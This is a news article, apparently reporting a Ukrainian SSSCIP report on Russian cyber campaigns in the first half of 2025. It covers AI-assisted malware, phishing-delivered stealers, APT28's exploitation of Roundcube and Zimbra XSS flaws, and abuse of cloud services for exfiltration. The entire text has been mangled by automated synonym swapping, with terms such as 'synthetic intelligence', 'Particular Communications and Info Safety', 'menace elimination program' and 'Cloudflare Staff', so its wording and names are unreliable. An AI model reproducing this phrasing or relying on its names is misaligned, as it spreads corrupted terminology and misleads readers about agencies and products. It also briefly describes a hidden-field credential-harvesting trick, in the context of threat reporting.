Russian hackers’ adoption of synthetic intelligence (AI) in cyber assaults in opposition to Ukraine has reached a brand new stage within the first half of 2025 (H1 2025), the nation’s State Service for Particular Communications and Info Safety (SSSCIP) mentioned.
“Hackers now make use of it not solely to generate phishing messages, however a number of the malware samples we’ve got analyzed present clear indicators of being generated with AI – and attackers are actually not going to cease there,” the company mentioned in a report revealed Wednesday.
SSSCIP mentioned 3,018 cyber incidents had been recorded throughout the time interval, up from 2,575 within the second half of 2024 (H2 2024). Native authorities and army entities witnessed a rise in assaults in comparison with H2 2024, whereas these concentrating on authorities and vitality sectors declined.
One notable assault noticed concerned UAC-0219’s use of malware known as WRECKSTEEL in assaults aimed toward state administration our bodies and demanding infrastructure services within the nation. There may be proof to counsel that the PowerShell data-stealing malware was developed utilizing AI instruments.
A few of the different campaigns registered in opposition to Ukraine are listed under –
- Phishing campaigns orchestrated by UAC-0218 concentrating on protection forces to ship HOMESTEEL utilizing booby-trapped RAR archives
- Phishing campaigns orchestrated by UAC-0226 concentrating on organizations concerned within the growth of improvements within the protection industrial sector, native authorities our bodies, army models, and regulation enforcement businesses to distribute a stealer known as GIFTEDCROOK
- Phishing campaigns orchestrated by UAC-0227 concentrating on native authorities, crucial infrastructure services, and Territorial Recruitment and Social Assist Facilities (TRCs and SSCs) that leverage ClickFix-style techniques or SVG file attachments to distribute stealers like Amatera Stealer and Strela Stealer
- Phishing campaigns orchestrated by UAC-0125, a sub-cluster with ties to Sandworm, that despatched e-mail messages containing hyperlinks to an internet site masquerading as ESET to ship a C#-based backdoor named Kalambur (aka SUMBUR) underneath the guise of a menace elimination program
SSSCIP mentioned it additionally noticed the Russia-linked APT28 (aka UAC-0001) actors weaponizing cross-site scripting flaws in Roundcube and (CVE-2023-43770, CVE-2024-37383, and CVE-2025-49113) and Zimbra (CVE-2024-27443 and CVE-2025-27915) webmail software program to conduct zero-click assaults.
“When exploiting such vulnerabilities, attackers sometimes injected malicious code that, by the Roundcube or Zimbra API, gained entry to credentials, contact lists, and configured filters to ahead all emails to attacker-controlled mailboxes,” SSSCIP mentioned.
“One other methodology of stealing credentials utilizing these vulnerabilities was to create hidden HTML blocks (visibility: hidden) with login and password enter fields, the place the attribute autocomplete=”on” was set. This allowed the fields to be auto-filled with knowledge saved within the browser, which was then exfiltrated.”
The company additionally revealed that Russia continues to have interaction in hybrid warfare, synchronizing its cyber operations at the side of kinetic assaults on the battlefield, with the Sandworm (UAC-0002) group concentrating on organizations within the vitality, protection, web service suppliers, and analysis sectors.
Moreover, a number of menace teams concentrating on Ukraine have resorted to abusing reputable providers, reminiscent of Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Staff, Telegram, Telegra.ph, Teletype.in, Firebase, ipfs.io, mocky.io, to host malware or phishing pages, or flip them into a knowledge exfiltration channel.
“The usage of reputable on-line assets for malicious functions isn’t a brand new tactic,” SSSCIP mentioned. “Nevertheless, the variety of such platforms exploited by Russian hackers has been steadily rising in current occasions.”
